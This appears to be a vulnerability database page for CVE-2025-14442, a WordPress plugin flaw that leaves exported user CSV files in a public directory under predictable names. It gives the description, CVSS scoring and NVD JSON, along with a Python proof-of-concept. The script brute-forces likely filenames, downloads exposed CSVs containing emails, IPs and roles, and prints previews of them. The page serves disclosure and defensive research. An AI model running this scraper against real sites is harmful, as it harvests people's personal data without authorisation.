Security Vulnerability Report
中文
CVE-2025-14442 CVSS 5.3 MEDIUM

CVE-2025-14442

Published: 2025-12-12 12:15:46
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to sensitive information exposure due to storage of exported CSV files in a publicly accessible directory with predictable filenames in all versions up to, and including, 4.9.2. This makes it possible for unauthenticated attackers to access sensitive user data including emails, IP addresses, usernames, roles, and location data by directly accessing the exported CSV file.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Secure Copy Content Protection and Content Locking plugin <= 4.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-14442 PoC - WordPress Secure Copy Content Protection Information Disclosure This PoC demonstrates how to detect and exploit the information disclosure vulnerability. """ import requests import sys from datetime import datetime, timedelta TARGET_URL = "http://target-wordpress-site.com" # Common export directory paths used by the plugin COMMON_PATHS = [ "/wp-content/uploads/secure-copy-content-protection/", "/wp-content/uploads/sccp-exports/", "/wp-content/plugins/secure-copy-content-protection/exports/", "/wp-content/uploads/exports/", ] def generate_predictable_filenames(): """Generate potentially predictable CSV filenames based on common patterns.""" filenames = [] base_names = [ "exported_data", "user_export", "subscriber_export", "user_data", "leads_export", "form_data", "locked_content_users", ] # Add date-based filenames for i in range(30): date = datetime.now() - timedelta(days=i) for base in base_names: filenames.append(f"{base}_{date.strftime('%Y%m%d')}.csv") filenames.append(f"{base}_{date.strftime('%Y-%m-%d')}.csv") # Add simple numbered filenames for i in range(1, 100): for base in base_names: filenames.append(f"{base}_{i}.csv") filenames.append(f"{base}-export-{i}.csv") return filenames def check_vulnerability(target_url): """Check if the target WordPress site is vulnerable.""" print(f"[*] Scanning target: {target_url}") print("[*] Generating potential CSV filenames...") filenames = generate_predictable_filenames() found_files = [] for base_path in COMMON_PATHS: print(f"\n[*] Checking path: {base_path}") for filename in filenames[:200]: # Limit to avoid timeout url = f"{target_url}{base_path}{filename}" try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200 and len(response.content) > 0: # Check if response looks like CSV if b'email' in response.content.lower() or b',' in response.content[:100]: print(f"[+] POTENTIAL VULNERABILITY FOUND!") print(f"[+] URL: {url}") print(f"[+] Size: {len(response.content)} bytes") found_files.append({ 'url': url, 'size': len(response.content), 'content_preview': response.content[:500] }) except requests.RequestException as e: continue if found_files: print(f"\n[!] Found {len(found_files)} potential vulnerable files!") for info in found_files: print(f"\n[+] File URL: {info['url']}") print(f"[+] Preview:") print(info['content_preview'].decode('utf-8', errors='ignore')[:300]) return True else: print("[-] No vulnerable files found with common patterns.") print("[-] Manual verification may be required.") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability(TARGET_URL)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14442", "sourceIdentifier": "[email protected]", "published": "2025-12-12T12:15:46.377", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to sensitive information exposure due to storage of exported CSV files in a publicly accessible directory with predictable filenames in all versions up to, and including, 4.9.2. This makes it possible for unauthenticated attackers to access sensitive user data including emails, IP addresses, usernames, roles, and location data by directly accessing the exported CSV file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-552"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.9.0/admin/class-secure-copy-content-protection-admin.php#L557", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.9.3/admin/class-secure-copy-content-protection-admin.php#L560", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/secure-copy-content-protection/#developers", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/72b95777-d17b-4504-95fd-c83b18106b9e?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.